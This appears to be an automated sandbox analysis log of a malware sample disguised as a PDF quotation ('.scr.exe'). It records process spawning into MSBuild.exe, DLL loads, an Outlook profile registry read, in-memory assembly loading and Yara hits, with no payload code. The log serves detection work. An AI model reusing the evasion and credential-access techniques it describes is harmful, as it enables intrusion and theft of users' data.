Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 10			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 10			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2347202995.0000013750D40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2347202995.0000013750D40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747ce3710.5.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747ce3710.5.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747ce3710.5.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747ce3710.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747ce3710.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750490000.9.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750490000.9.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750490000.9.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750490000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750490000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750ce0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747c5c0a0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2346839728.0000013750CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9B877F2D push E95E5346h; ret		0_2_00007FFD9B877F49
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC1B3FF push eax; iretd		0_2_00007FFD9BC1B431
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC1756B push ebx; iretd		0_2_00007FFD9BC1756A
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC1752B push ebx; iretd		0_2_00007FFD9BC1756A
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC07548 push ebx; iretd		0_2_00007FFD9BC0756A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 10_2_00007FFD9B880D28 push es; ret		10_2_00007FFD9B880D27
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 10_2_00007FFD9B889901 push cs; retf		10_2_00007FFD9B889905
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 10_2_00007FFD9B880C90 push edx; ret		10_2_00007FFD9B880CDB
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 10_2_00007FFD9B880CDC push es; ret		10_2_00007FFD9B880D27

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
